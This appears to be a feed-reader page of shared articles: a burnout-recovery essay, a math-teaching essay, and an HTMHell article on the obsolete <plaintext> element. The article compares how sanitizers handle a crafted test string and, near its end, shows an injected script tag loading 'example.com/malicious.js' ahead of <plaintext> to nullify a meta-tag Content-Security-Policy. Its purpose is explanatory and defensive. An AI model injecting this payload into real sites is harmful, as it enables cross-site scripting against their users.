1193 stories
·
1 follower

The surprisingly freeing joy of being bad at something

1 Share

Lately I’ve been thinking about how much pressure we put on ourselves to only do things we’re already good at. Somewhere along the way, “trying something new” stopped sounding fun and started feeling like a reputational risk. Like if you can’t perform at a certain level instantly, you shouldn’t bother.

That mindset looks harmless from the outside. It feels responsible. Mature, even. But it quietly chokes off the part of you that’s curious, playful, and willing to be surprised. And it keeps you stuck in the same narrow corners of your life.

What I’ve been noticing in myself is this instinct to avoid anything where I can’t show up as the polished version of who I used to be. The competent one. The quick learner. The person who could pick something up and immediately “get it.”

(We’ve been unpacking this in therapy.)

Burnout has a way of shrinking your world like that. Even long after the exhaustion fades, the pressure to not mess up can linger. You don’t want to see yourself fall short again, so you avoid situations where you might.

I’ve accepted that I’ve been putting pressure on myself that nobody else is even giving a second thought to. Nobody is asking me to figure it out on the first try, to be immediately good at something. It’s a self-imposed requirement that sets me up to fail.

But recently, I’ve been letting myself be bad at things again. Truly bad. And there’s something surprisingly freeing about it.

Being bad lowers the stakes

Take learning French. I have all the apps. All the books. All the good intentions. And yet: my pronunciation? Rough. My verb conjugations? In progress. My confidence? Depends on the hour. Generally low. I’m still terrified to speak French in public, but I did say one sentence in French out loud today. Please clap.

For a while, that bothered me. I felt slow. Like I was failing. Like my brain should just “try harder.”

But then I realized the moment you admit you’re bad at something, the pressure to be perfect disappears. There’s nothing to protect. No expectations to uphold. You’re just a person learning a new thing, which is one of the most human experiences you can have.

It’s honestly kind of fun.


After Burnout is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.


Being bad opens the door to creativity

There’s also this unexpected creativity that shows up when you stop needing to be good right away. When you’re allowed to make mistakes, you naturally experiment more. You explore. You follow impulses without evaluating whether they’re “right.”

That messy middle is where the good stuff hides.
It’s where play comes back.

And play is a muscle you lose when everything in your life has revolved around productivity, competence, or survival.

Being bad rebuilds your trust in yourself

The more I let myself be terrible at something, the more I notice how quickly “terrible” turns into “okay,” and how “okay” eventually turns into “not bad actually.”

It’s not about the skill. It’s about proving to yourself that you can start small, stay with it, and watch the world open a little because you were brave enough to begin.

That’s the quiet part of burnout recovery no one talks about. Your life expands again through the small, low-stakes attempts.

Not through a grand reinvention, but through tiny, unimpressive experiments that remind you you’re still capable of learning and creating.

Letting yourself be a beginner again

So here’s where I’ve landed:

You don’t need confidence before you try something. Confidence shows up after you’ve tried it enough times that you stop caring how you look doing it.

Letting yourself be bad at something isn’t a failure. It’s an act of self-trust. It’s choosing curiosity over ego. It’s giving yourself permission to exist outside the narrow confines of what you already know how to do.

Honestly, it feels good to grow again, even if the growth looks awkward at first.

If you’re in a season of rebuilding, or rediscovering parts of yourself, or letting your world widen after it’s felt small for a while, maybe give yourself the gift of being bad at something. You might enjoy who you become on the other side of it.

Read the whole story
mrmarchant
just a second ago
reply
Share this story
Delete

Very Good Music Fun Facts

1 Share
Sometimes, you are at a party with new people and need something to talk about.

Source

Read the whole story
mrmarchant
14 minutes ago
reply
Share this story
Delete

An Alternative to I/We/You

1 Share

Gradual Release of Responsibility

I’m not a fan of I/we/you lessons.

I/we/you is the default lesson structure for lots of math teachers. Start by modeling a skill. Then work through the skill as a class. Then give students some independent practice.

The tagline for this type of teaching is “gradual release of responsibility.” A graph of the lesson might look like this:

Take the task you want students to be able to do. Start by offering a lot of support, typically by modeling or looking at examples, then gradually have the students do more of the work themselves until they’re doing the task on their own.

I don’t think this is a good model. Instead of I/we/you with gradual release of responsibility, I think it‘s more helpful to think of a gradual increase in difficulty.

Gradual Increase in Difficulty

Gradual increase in difficulty might look like this:

But that’s actually not realistic. The stuff we want kids to learn doesn’t break down into nice neat steps that are all the same size. Maybe a lesson looks more like this:

I’m not putting teacher support on here, because it’s not some predetermined gradual release in responsibility. Instead it’s adaptive: some steps are small and students can make the jump without much support. Others are trickier and require more support.

Here’s what this might look like in terms of I/we/you:

You/I/you/you/I/you (this is a bunch of review questions about relevant prior knowledge, with some quick reteaches as necessary)

I/we/you (there’s a jump in difficulty that students need some support with)

I/you/I/you (this is two quick cycles for small, manageable chunks of new learning building on the last step)

You/you (this is a few more jumps in difficulty, but smaller jumps that students can do on their own)

I/you (one final model and then some more practice)

The key to making all this work is to break learning down into small, manageable steps, and help students connect each new step to what came before it. This is a big mental shift from teaching one objective at a time. It requires knowing your content well. It also means tossing out some of the curricular resources you might’ve been given.

I’m sure some people are saying, “Hey, this is how I teach, and I call this I/we/you.” Great! Glad we agree. My experience is that what I’m describing is very different from how most teachers conceptualize I/we/you. This is not a “gradual release” model — the support varies across the lesson, with students doing plenty on their own very early on. There’s some I/we/you within the lesson, but it doesn’t start with the “I” chunk and I don’t think I/we/you is a good way to describe this type of teaching. I/we/you is a tool. It’s useful at some specific places in a lesson, but not a structure for entire lessons.

Some Benefits

Here are some benefits of the gradual increase in difficulty approach:

  • Review is so important. Review to improve retention of what was taught yesterday, to activate prior knowledge, to check prerequisite knowledge and reteach if necessary. When done well, review can also build confidence early in a lesson. I realize there is no rule saying “no review is allowed in I/we/you lessons.” But if the name of the teaching strategy begins with the “I” section, that will inevitably push teachers away from starting with review.

  • There are no sudden jumps in difficulty. I’ve seen — and taught — plenty of I/we/you lessons that are a bit of a mess. The jump in difficulty is just too big. The teacher knows it’s a bit of a mess, so the “I” and “we” stages drag on. There’s not much time left for independent practice, half the class is confused, and it all ends in a muddle. I can’t promise you that a gradual-increase-in-difficulty lesson will go smoothly. That’s not how teaching works. But by approaching learning one small step at a time it’s much less likely to fall apart completely. Maybe students are shaky on some of the early steps, and they take longer than you would like. Maybe you don’t get through everything you planned. Much better to teach the first few steps well than to bite off more than you can chew and have to start from scratch the next day.

  • There are fewer artificial divisions between objectives. I/we/you lessons break content down into lesson-size chunks. Here is today’s objective, then tomorrow’s, then the next day’s. Unfortunately, learning doesn’t always fit neatly into those chunks. Some days will be too much, some will be too easy. Focusing on a gradual increase in difficulty throws out those distinctions. It’s a gradual ramp, and you get through what you get through in each lesson.

  • There are more opportunities to check for understanding. It is possible to check for understanding in the “I” and “we” stages of an I/we/you lesson. But it’s not easy. The entire premise is a gradual release of responsibility, so students aren’t doing the task independently until the “you” stage. A gradual increase of difficulty lesson involves lots of “you” throughout the entire lesson. You have lots of chances to check for understanding, reteach, support specific students, and adjust as you go.

  • Students are more motivated when they can successfully solve problems early in a lesson. Get students doing math and building confidence as early as you can, and use that confidence to tackle more challenging problems.

  • The teacher support is dynamic. For some tasks, students need a lot of guidance. You can provide that. For others, students can extend what they know with much less support. You can do that too. The key is the gradual increase in difficulty, and that helps to reduce teacher talk and get students doing as much of the thinking as possible.

  • It’s easier to interleave. Interleaving different skills is a key aspect of increasing difficulty that’s often forgotten until the review day before the test. Students need mixed practice, identifying different types of questions and applying different solution strategies. In a typical I/we/you structure, each objective lives in its own world. In a gradual increase in difficulty, many of those small steps are just interleaved practice between distinct skills.

  • It’s easier to include challenging, non-routine problems. In an I/we/you structure, more challenging problems are often saved until the end of the unit, or for specific objectives like “solve multi-step problems.” In this model, the gradual increase in difficulty means that I can often end classes by challenging students to apply what they’ve learned in a few different and non-routine ways, rather than being laser focused on one very specific objective.

  • I spend less time explaining. Lots of explanations go on too long because students don’t have solid prior knowledge, or the jump in difficulty is too big, or the teacher feels like they need to explain everything about a topic before students try it. In a gradual increase in difficulty model, there’s a bunch of work to prepare students for the explanations I do include. But those explanations happen in small chunks that are only slightly more difficult than the last step, and when students can figure something out themselves I let them do so. All that adds up to way less time explaining. I’m not against explaining — teachers should explain things to students! But those explanations should be short, and should get students doing math as soon as possible.

I realize that the difference between a gradual release of responsibility and a gradual increase in difficulty may seem small. But I think it’s a really valuable paradigm shift, and it opens up a ton of opportunities that are lost in a typical I/we/you structure. I/we/you isn’t totally broken — I use it as one element of the gradual increase approach. But it’s just one strategy for me, rather than a way to structure an entire lesson. Whenever I think about teaching a new topic, I start by finding ways to break that topic down into small chunks and sequencing those chunks in a gradual increase in difficulty. It’s not easy as first. But the more I’ve practiced breaking topics down into small, manageable bits, the more this type of teaching makes sense to me.

Read the whole story
mrmarchant
12 hours ago
reply
Share this story
Delete

Beej's Guide to Learning Computer Science

1 Share
Comments
Read the whole story
mrmarchant
22 hours ago
reply
Share this story
Delete

Using the Ancient Evils for Debugging

1 Share
by Manuel Strehl

Deep down in the dark voids of HTML specs long gone sleeps a terrifying thing. Imagine, if you will, a DOM node so mighty, that it can change the content-type of parts of the document. An HTML element that makes the parser tremble and withdraw, and that cannot be stopped even by its own end tag.

The wise people of W3C try to keep the knowledge of this terror away from the mere mortals’ eyes to spare us the danger of its madness. They advise us not to use the magic tag name that is the incantation for this ancient malice.

We will, of course, do exactly this today. We’ll take a deep look at the

<plaintext>

element and what fun things we can use it for.

A Quick Warning

This being said, I’d like to point out one important thing: Do not use this element in production. The HTML living standard is quite clear about this:

Elements in the following list are entirely obsolete, and must not be used by authors: [...] plaintext

So, what does <plaintext> do that earned it its place on HTML’s list of deprecated elements? In a nutshell, it ends the HTML parser and instructs the browser to interpret everything following as plain text.

That is to be taken literally. Really everything, including any closing </plaintext> or </html>, will be printed as if a rogue, unclosed <pre> would suddenly go haywire and slurp up the rest of the page. By the way, this makes <plaintext> the only non-empty element that has no end tag at all.

What Do We Use this Power For?

On first sight that sounds like a really stupid superpower. On second sight, it still does. We look into how that element became part of HTML below. But now we will use it for one specific purpose: debugging server-side code.

Of course, specialized debuggers like XDebug for PHP or built-in error pages in frameworks like Django take over the heavy lifting here. And even the good ol’ print "<script>console.log('here!')</script>" is often helpful. Those tools should be high up in your utility belt.

But imagine this: You are deep in your code, chasing an elusive bug that affects only part of the HTML output, and you want to spot on the rendered page exactly where it shows up. The fastest way is to put a quick <plaintext> close to the offending place, reload the page, and presto! Just scan down to where the markup starts to show through.

This is especially useful to access formatted debugging output. A var_dump() in PHP, for example. Or an error.stack stack trace in NodeJS. Slap a <plaintext> in front of it before writing it to the HTML output, so that the string is immediately readable:

<?php
# TODO delme!
echo '<plaintext>'; var_dump($strange_variable);

A screenshot of the HTMHell website where the lower part shows a PHP variable output followed by the site’s markup instead of the rendered HTML

If you’re working on an expressJS application, it could look like this:

try {
some_method();
} catch (error) {
response.send(`<plaintext>${error.stack}`);
}

A screenshot of the same HTMHell website as above with the lower part showing a JS error stack followed by the site’s markup instead of the rendered HTML

The History behind this Evil

How ended this seemingly fringe feature up in all mainstream browsers? It was indeed there from the very beginning of HTML as this historic W3C document from 1992 proves:

Plaintext

This tag indicates that all following text is to be taken litterally [!], up to the end of the file. Plain text is designed to be represented in the same way as example XMP text, with fixed width character and significant line breaks. Format:

<PLAINTEXT>

This tag allows the rest of a file to be read efficiently without parsing. Its presence is an optimisation. There is no closing tag.

This also tells us the reason for its invention. Back at the time Sir Tim Berners-Lee’s high-end NeXT PC that he used to write the first web browser had a quarter of the power of a hand-me-down 2009 smartphone. It was important to optimize wherever you could.

Given that the early WWW was meant as a place to share scientific information, having a large blob of plain text as part of your fancy new HTML page was relatively common. The possibility to end the costly HTML parser and fall back to simply printing the remainder of the file as plain text was a powerful tool.

partial screenshot of a browser window. The address bar is shown, and the content of the page looks like a window of an old desktop OS.
Screenshot: This is a rendering of a 1992 example for the use of the <plaintext> element by an emulation of the very first web browser at CERN. (I had to trick it a bit, though, because the file that the emulator would try to access returned a 404 error.)

Such a feature isn’t unique to HTML, either. For example, the programming language Perl uses a special marker to tell the Perl parser to stop processing the remainder of the file:

print 'this is Perl code';
__END__
cout << 'this isn’t anymore';

(Perl programmers use this not for performance reasons but to embed additional data into their programs.)

Of course, nowadays, in the face of multi-megabyte JS payloads, this optimization has become completely unnecessary.

How Safe Are We?

But the element is still looming in all browsers, so it's worth keeping a bit of a working knowledge of it at the back of our minds.

To give you an example of how this feature could be mis-used, assume a comment function on a blog, where the commenter was able to smuggle in the string <plaintext>. As good developers we know never to trust users’ input, so we put the comment through a sanitizer. Let’s take a look at where things can go south from here.

We use the test string

<p><b>hello<plaintext>world!</plaintext></b></p>

to check how several sanitizer libraries react to it.

There Goes the Sanity!

We run each sanitizer in the most minimal configuration that produces any output. This is by design: sanitizers are security products. They should produce safe output by default.

The results are quite surprising, though. (Click on a library’s name below to reveal the horrifying details.) You will notice that no two libraries (apart from the Sanitizer API and DOMPurify, where the former was directly inspired by the latter) agree on how to sanitize our test string.

The new HTML Sanitizer API as implemented in Firefox

developer.mozilla.org/en-US/docs/Web/API/Document/parseHTML_static

Code:

console.log(Document.parseHTML(TEST_STRING).body.innerHTML);

The approach of this API is to somehow get the nesting correct again according to the HTML5 parser spec. That is, close the <p> and <b> tags, then re-open the <b> tag as the spec suggests. The API does not deal with the special semantics of <plaintext> at all, though.

Result:

We end up with a string that has the <plaintext> element and its content stripped away:

<p><b>hello</b></p>
Poor man’s DOM sanitizing

Code:

const div = document.createElement('div');
div.innerHTML = TEST_STRING;
console.log(div.innerHTML);

For this test we set the test string via HTMLElement.innerHTML = test_string and read it again via .innerHTML. Chrome and Firefox show the same result. This does not really sanitize anything. But we include it in the list, because it demonstrates what the JS engine will do to the test string when interpreting it as HTML.

Result:

The result is a mangled version of the original, which will have double-encoded content in the still retained <plaintext> element.

<p><b>hello</b></p><plaintext><b>world!&lt;/plaintext&gt;&lt;/b&gt;&lt;/p&gt;</b></plaintext>

NB: We can trick the Sanitizer API into producing this output, too, if we’re careless with its configuration:

Document.parseHTML(TEST_STRING, { sanitizer: { removeElements: []}}).body.innerHTML
HTML Tidy

www.html-tidy.org/

Code:

echo -n "$TEST_STRING" | tidy

Result:

The venerable Tidy replaces the <plaintext> with a <pre>. This is creative.

<p><b>hello</b></p>
<pre><b>world!</b></pre>
xss

jsxss.com/

Code:

import xss from 'xss';
console.log(xss(TEST_STRING));

Result:

A well-known JavaScript-based sanitizer with special focus on XSS prevention escapes only the <plaintext> tags and leaves everything else in place.

<p><b>hello&lt;plaintext&gt;world!&lt;/plaintext&gt;</b></p>
DOMPurify

github.com/cure53/DOMPurify

Code:

import { JSDOM } from 'jsdom';
import DOMPurify from 'dompurify';

const purify = DOMPurify(new JSDOM('').window);
console.log(purify.sanitize(TEST_STRING));

Result:

The classic JS sanitizer chooses to remove the <plaintext> and all its “content”. (I put content in quotes, because technically everything after the start tag would’ve been the <plaintext>’s content.) DOMPurify sees to it that the elements are properly closed. The result is identical to that of the Sanitizer API.

<p><b>hello</b></p>
HTML Purifier

htmlpurifier.org/

Code:

<?php
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
printf($purifier->purify(TEST_STRING));

Result:

The top dog in the PHP world takes a slightly different approach. It removes only the element itself. (Note the “world!” remaining intact.)

<p><b>helloworld!</b></p>
Symfony HtmlSanitizer

symfony.com/html-sanitizer

Code:

<?php
use Symfony\Component\HtmlSanitizer\HtmlSanitizer;
use Symfony\Component\HtmlSanitizer\HtmlSanitizerConfig;

$config = (new HtmlSanitizerConfig())->allowSafeElements();
$sanitizer = new HTMLSanitizer($config);
printf($sanitizer->sanitize(TEST_STRING));

Result:

Symfony’s sanitizer has a fascinating way of moving tags around. Interesting, but at least we’ve got all elements properly closed, including the uncloseable plaintext.

<p><b>hello</b></p><plaintext>world!</plaintext>
xmllint

gnome.pages.gitlab.gnome.org/libxml2/xmllint.html

Code:

echo -n "$TEST_STRING" | xmllint --html -

Result:

This libxml-based tool produces a warning about an “invalid tag plaintext” but keeps the markup completely unchanged:

<p><b>hello<plaintext>world!</plaintext></b></p>
Mozilla Bleach

github.com/mozilla/bleach

Code:

import bleach
print(bleach.clean(TEST_STRING))

Result:

Python developers who reach for this library will have everything but the <b> escaped.

&lt;p&gt;<b>hello&lt;plaintext&gt;world!&lt;/plaintext&gt;</b>&lt;/p&gt;
OWASP Java HTML Sanitizer

github.com/OWASP/java-html-sanitizer/

Code:

import org.owasp.html.PolicyFactory;
import org.owasp.html.Sanitizers;

public class Sanitize {
public static void main(String[] args) {
PolicyFactory policy = Sanitizers.FORMATTING.and(Sanitizers.LINKS);
String safe = policy.sanitize(TEST_STRING);
System.out.println(safe);
}
}

Result:

The staple HTML sanitizer in the Java world escapes everything and does strange things to the end tags, but at least the <plaintext> is gone.

<b>helloworld!&lt;/plaintext&gt;&lt;/b&gt;&lt;/p&gt;</b>
Ammonia as configured by nh3

github.com/rust-ammonia/ammonia, nh3.readthedocs.io/

Code:

import nh3
print(nh3.clean(TEST_STRING))

This Rust-based sanitizer advertises its speed and conformance with the HTML spec.

Result:

The result is close but still different to what browsers will do. In this case, it’s the <b> tag that would not extend over the content of the <plaintext> element.

<p><b>hello</b></p><b>world!&lt;/plaintext&gt;&lt;/b&gt;&lt;/p&gt;</b>

With 11 sanitizing methods we managed to produce 10 different outputs!

Just to be crystal clear here: we are not criticizing the result of any of these libraries. Each one has a good reason to do what they do. And each one serves a slightly different purpose.

But it emphasizes the point that one should be absolutely sure about the aim of a chosen sanitizer and the extent as to which it will change its input. Is the library for removing only potentially dangerous things but keeping as much HTML intact as possible? Is it to scrape all HTML off the string, or to only escape HTML-special characters? The results will differ tremendously.

We enter the danger zone when mixing several tools together without taking a cautious look first.

For example, look at how DOMPurify and HTML Purifier would interact in a potentially hazardous way. DOMPurify would remove any <plaintext> including its content. A later check for any malicious payload would be negative. HTML Purifier on the other hand just strips the <plaintext> tag, while its content remains on the page. If we’d trust the previous DOMPurify result, we’d be surprised by sudden new content being placed verbatim in the HTML code.

If one library is used for input validation and another one for output quoting, that’s a cross-site scripting disaster waiting to happen, unless we know exactly what we’re doing.

Letting the Evil Sleep Again

In the case of <plaintext> itself we are most likely in a safe place. Since <plaintext> has built-in HTML escaping, doing something dangerous with it is severely limited. It takes quite rare a constellation of errors and oversights to appear together in order to run malicious code.

For the sake of the argument, let’s create such a constellation. Assume that you embed a Content-Security Policy on your site in a <meta> element instead of an HTTP header:

<meta http-equiv="Content-Security-Policy" content="script-src 'self'">

This prevents loading 3rd party scripts sufficiently. If an attacker finds a possibility to load HTML prior to this element, they can nullify the CSP:

<script src="https://example.com/malicious.js"></script>
<plaintext>
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">

But again, for this to really have any effect, several things must come together:

  • The attacker must be able to place HTML in the <head> (because CSP meta tags can only be used there)
  • The CSP is not set via HTTP
  • The complete remainder of the page is converted to text/plain, which makes this definitively not a stealthy attack

So we can conclude: It is important to know about <plaintext>. But if we follow tried and tested security rules (for example the OWASP Application Security Verification Standard), we will remain safe from this ancient evil.

I’d like to thank Tom Schuster, Christian Vogl, and Daniela Strehl for valuable input to this article and Elise Hein for an extremely helpful review.

Read the whole story
mrmarchant
1 day ago
reply
Share this story
Delete

Introducing RFC Hub

1 Share
Read the whole story
mrmarchant
1 day ago
reply
Share this story
Delete
Next Page of Stories